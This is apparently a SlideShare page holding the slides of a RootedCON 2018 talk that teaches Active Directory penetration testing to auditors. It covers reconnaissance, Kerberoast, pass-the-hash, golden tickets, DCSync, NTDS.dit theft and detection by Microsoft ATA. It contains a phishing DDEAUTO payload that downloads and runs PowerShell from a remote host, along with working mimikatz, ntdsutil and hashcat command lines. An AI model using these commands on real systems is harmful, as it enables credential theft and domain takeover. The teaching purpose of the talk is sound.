SlideShare a Scribd company logo

Carlos García - Pentesting Active Directory [rooted2018]

RootedCON
RootedCON

Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.

Technology
1 of 96
Download to read offline
PENTESTING ACTIVE DIRECTORY Carlos García García ciyinet
ciyinet WHOAMI Carlos García García - Computer Science Engineer - Penetration Testing and Red Teaming - OSCP Certified - Co-author book “Hacking Windows: Ataques a sistemas y redes Microsoft” 2Pentesting Active Directory
ciyinet WHAT ARE WE GOING TO TALK ABOUT? - Introduction to Active Directory - Authentication Protocols - Active Directory Penetration Testing - Reconnaissance - Common Attacks & Techniques - Lateral and Vertical Movements - How-to Avoid Being Caught 3Pentesting Active Directory
ciyinet BEAR IN MIND - AD-related techniques - I learn Active Directory from the offensive side - We lower risks and not the other way around - This is going to be intense 4Pentesting Active Directory
ciyinet 5 ACTIVE DIRECTORY 101 Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 • AD is Microsoft’s answer to directory services • Directory service is a hierarchical structure to store objects for quick access and management of all resources 6Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 • Uses LDAP as its access protocol • Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries • AD supports several Naming Conventions • User Principal Names (UPN): • user@domain • LDAP names (Distinguished Names): • cn=common name • ou=organizational unit • dc=domain • for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON 7Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 8Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 Just a Database: NTDS.dit 9Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 Domain Controllers and Domain Admins 10Pentesting Active Directory
ciyinet CREDENTIALS FLOW IN WINDOWS 11Pentesting Active Directory
ciyinet 12 NTLM SCHEME Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 13 KERBEROS SCHEME Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
ciyinet 14 KERBEROS SCHEME Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
PENTESTING ACTIVE DIRECTORY Sure, but how about actually pentesting it?
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 16Pentesting Active Directory
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 17Pentesting Active Directory • Domain admins • Enterprise admins • Built-in administrators • Account Operators • Allowed RODC Password Replication Group • Backup Operators • DnsAdmins • …
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! 18Pentesting Active Directory
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! WMIC 19Pentesting Active Directory
ciyinet 20 ATTACK KILL CHAIN Reference: Microsoft Advanced Threat Analytics Pentesting Active Directory
ciyinet 21 ATTACK KILL CHAIN Pentesting Active Directory
ciyinet 22 ATTACK KILL CHAIN Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Infrastructure
ciyinet 24Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Classic Intrusion Scheme
ciyinet 26Pentesting Active Directory
ciyinet 27 PHISHING + DDEAUTO = RCE • Dynamic Data Exchange (DDE): protocol for transferring data between applications • Valid for MS Excel, MS Word… and MS Outlook • Recently used as macro-less Malware DDEAUTO "C:ProgramsMicrosoftOffice365Outlook........windowssystem 32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire- test.ps1');powershell -e $e # " "Beneficios Qurtuba" Pentesting Active Directory
ciyinet 28
ciyinet 29 NEXT STEPS • Persistence (userland) • Recoinaissance • Privilege escalation • PowerSploit PowerUp • Bypass UAC • … • Persistence (admin) • Lateral and vertical movements • Grab and exfiltrate trophies Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Reconnaissance
ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description ipconfig /all Displays the IP address, subnet mask, and default gateway for all adapters. Also info about DHCP and DNS settings whoami /all Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to net localgroup Displays the name of the server and the names of local groups on the computer. net localgroup “administrators” Displays local administrators netstat -an Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table tasklist /V Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer 31Pentesting Active Directory
ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description net start Lists started Windows services sc qc <SERVICE> Gets the parameters for an individual service accesschk.exe -ucqv <SERVICE> Determine service access control rules (accesschk.exe is part of Microsoft Sysinternals suite) systeminfo > info_output.txt Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with dir, type, findstr Browse and search for information in the local file system. 32Pentesting Active Directory
ciyinet NETWORK RECONNAISSANCE Command Description ping ☺ echo %USERDOMAIN% Domain name which the host is joined to echo %logonserver% Obtains the name of the Domain Controller the host used to authenticate toset logonserver net group /domain Lists existing groups in the domain net group <GROUP NAME>/domain Lists members of a group. I.e: “domain computers”, “domain controllers”, “domain admins” net localgroup administrators /domain Gets members of the built-in group “Administrators” Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 33Pentesting Active Directory
ciyinet NETWORK RECONNAISSANCE Command Description net user /domain Lists all users within the domaindominio actual net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username net view Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain net use Access to shared resources net accounts /domain Obtains the domain password policy nltest /domain_trusts Maps trust relationships Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 34Pentesting Active Directory
ciyinet 35
PENTESTING ACTIVE DIRECTORY Common Attacks & Techniques
ciyinet 37 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
ciyinet 38 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
ciyinet 39 KERBEROAST Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Attacker
ciyinet 40 KERBEROAST • Offline brute force of password of service account within service tickets (TGS) • No risk of detection • No account lockouts • Invoke-Kerberoast from PowerView (dev) to collect hashes • Focus on user accounts. They have shorter passwords • JohnTheRipper (magnumripper) to crack them References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/magnumripper/JohnTheRipper Pentesting Active Directory
ciyinet 41 SMB SHARES MINING • Usually very fruitful, but sometimes boring and time consuming • Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation… PowerView Find-ShareDomain • Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned. smbmap • Intended to simplify searching for potentially sensitive data across large networks. • Enumerates samba share drives across an entire domain. List drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc. Reference: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/ShawnDEvans/smbmap Pentesting Active Directory
ciyinetTitulo de la Ponencia 42
ciyinet 43 CREDENTIAL THEFT SHUFFLE • Escalating privileges on some machine • Extracting creds/hashes from memory • Derivative administrator • User hunting: moving laterally and repeating the attack till Domain Admin level is reached References: https://github.com/gentilkiwi/mimikatz Pentesting Active Directory “Mimikatz dance”
ciyinet DERIVATIVE ADMINISTRATOR 44Pentesting Active Directory
ciyinet 45 USER HUNTING List local admins remotely • Get-localadmin (Script) • Get-NetLocalGroup (PowerView) List active sessions remotely • PsLoggedon (Sysinternals) • Get-NetLoggedon (PowerView) • Get-NetSession (PowerView) • Tasklist References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://docs.microsoft.com/en-us/sysinternals/ https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md Pentesting Active Directory
ciyinet 46
ciyinet 47 USER HUNTING • Invoke-UserHunter (PowerView) • BloodHound 1. Gets groups and group members of each group 2. Lists domain computers 3. Obtains local admins for each computer 4. Lists active sessions on each computer References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/BloodHoundAD/BloodHound Pentesting Active Directory
ciyinet
Creds dump + Privs escalation
ciyinetPentesting Active Directory 50 NTLM RELAY
ciyinet 51 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 52 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 53 OVERPASS-THE-HASH (PASS-THE-KEY) Kerberos Kerberos References: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
ciyinet 54 (OVER)PASS-THE-HASH Pentesting Active Directory mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
Titulo de la Ponencia 55
ciyinetPentesting Active Directory 56 PASS-THE-TICKET • Inject Kerberos tickets • Tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8 • Kerberos module does not require any privilege. It uses official Microsoft Kerberos API mimikatz.exe "kerberos::ptt FILENAME"
ciyinet 57 GOLDEN TICKET Encrypted with KRBTGT hash Attacker TGT: • Username • Groups membership • … krbtgt:hash Pentesting Active Directory
ciyinet 58 GOLDEN TICKET KRBTGT hash can be used to generate arbitrary TGT: • Made by the attacker, not KDC • Anything can be pushed inside mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt" Pentesting Active Directory
ciyinetPentesting Active Directory 59
ciyinet 60 DCSYNC • It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol) • Special rights are required to run DCSync mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit mimikatz.exe "lsadump::dcsync /all /csv" exit Pentesting Active Directory
ciyinetPentesting Active Directory 61
ciyinetPentesting Active Directory 62 DCSHADOW Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Hi guys! This is DCShadow!
PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
ciyinetPentesting Active Directory 64 REMOTE CODE EXECUTION AT Schtasks SC at TARGET_HOST HH:MM EXECUTABLE schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System schtasks /run /tn TASK_NAME /S TARGET_HOST sc TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE” sc TARGET_HOST start SERVICE_NAME
ciyinetPentesting Active Directory 65 REMOTE CODE EXECUTION WMIC WinRM PsExec wmic /node:TARGET_HOST process call create “EXECUTABLE” Invoke-Command –ComputerName TARGET_HOST –ScriptBlock { COMMAND(S) } PsExec.exe TARGET_HOST –u USER PROCESS
PENTESTING ACTIVE DIRECTORY Let’s grab the NTDS.dit DB
ciyinet NTDS.DIT 67Pentesting Active Directory
ciyinet NTDS.DIT How-to get hashes from it: 1. Decrypt Password Encryption Key (PEK). PEK is encrypted using bootkey 2. Hashes decryption first round with PEK using RC4 3. Hashes decryption second round with DES 68Pentesting Active Directory
ciyinet 69 GRAB NTDS.DIT AND SYSTEM Volume Shadow Copy Ntdsutil Invoke-NinjaCopy Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination “C:ntds.dit” Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination “C:SYSTEM” ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit vssadmin create shadow /for=C: Pentesting Active Directory
ciyinetTitulo de la Ponencia 70
ciyinetTitulo de la Ponencia 71
ciyinet John the Ripper Hashcat & Rockyou wordlist 72 CRACKING NT HASHES john FILE_HASHES --format=NT hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot Pentesting Active Directory
ciyinetPentesting Active Directory 73
Pentesting Active Directory 74
PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
ciyinetPentesting Active Directory 76 MICROSOFT ATA
ciyinet 77 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
ciyinet 78 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
ciyinetPentesting Active Directory 79
ciyinet 80 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 81 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 82 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 83 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Pentesting Active Directory
ciyinet 84 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Microsoft ATA Attacker Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Wrapping Up
ciyinet 86 • Plaintext creds • WDigest • SMB Mining • mimikittenz • LaZagne • WCMDump • Hash • Memory dump • … Pentesting Active Directory
ciyinet 87 • Run as • NTLM Relay • Pass-the-hash • Pass-the-ticket • Golden ticket Logon session User SID Group SIDs Logon SID Others … Access token Pentesting Active Directory
ciyinet 88 • PsExec • WinRM • AT • Schtasks • WMIC • SC Pentesting Active Directory
ciyinet 89 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
ciyinet 90 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
ciyinet 91 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
ciyinet 92 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
ciyinet 93 BUSINESS RISK Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain, all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees. “Once domain admin, always domain admin” Pentesting Active Directory
ciyinet 94 ACKNOWLEDGMENT & REFERENCES • Miroslav Sotak and TVM team • FWHIBBIT • RootedCON and any other Sec Community in Spain Pentesting Active Directory
ciyinetPentesting Active Directory 95 PENTESTING ACTIVE DIRECTORY
PENTESTING ACTIVE DIRECTORY Questions? Answers ciyinet carlos@ciyi.es ciyinet@protonmail.com

Recommended

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
Julian Catrambone
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

Recommended

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
Julian Catrambone
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
Vivek Chauhan
 
DNS & DNSSEC
DNS & DNSSECDNS & DNSSEC
DNS & DNSSEC
APNIC
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
DNSSEC Validation Tutorial
DNSSEC Validation TutorialDNSSEC Validation Tutorial
DNSSEC Validation Tutorial
APNIC
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
ken_kitahara
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
Daniel López Jiménez
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review ProcessSherif Koussa
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
Ajay Choudhary
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
SPC Adriatics
 

More Related Content

What's hot

PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
Vivek Chauhan
 
DNS & DNSSEC
DNS & DNSSECDNS & DNSSEC
DNS & DNSSEC
APNIC
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
DNSSEC Validation Tutorial
DNSSEC Validation TutorialDNSSEC Validation Tutorial
DNSSEC Validation Tutorial
APNIC
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
ken_kitahara
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
Daniel López Jiménez
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review ProcessSherif Koussa
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 

What's hot (20)

PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
 
DNS & DNSSEC
DNS & DNSSECDNS & DNSSEC
DNS & DNSSEC
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
DNSSEC Validation Tutorial
DNSSEC Validation TutorialDNSSEC Validation Tutorial
DNSSEC Validation Tutorial
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
 
(Ab)Using GPOs for Active Directory Pwnage
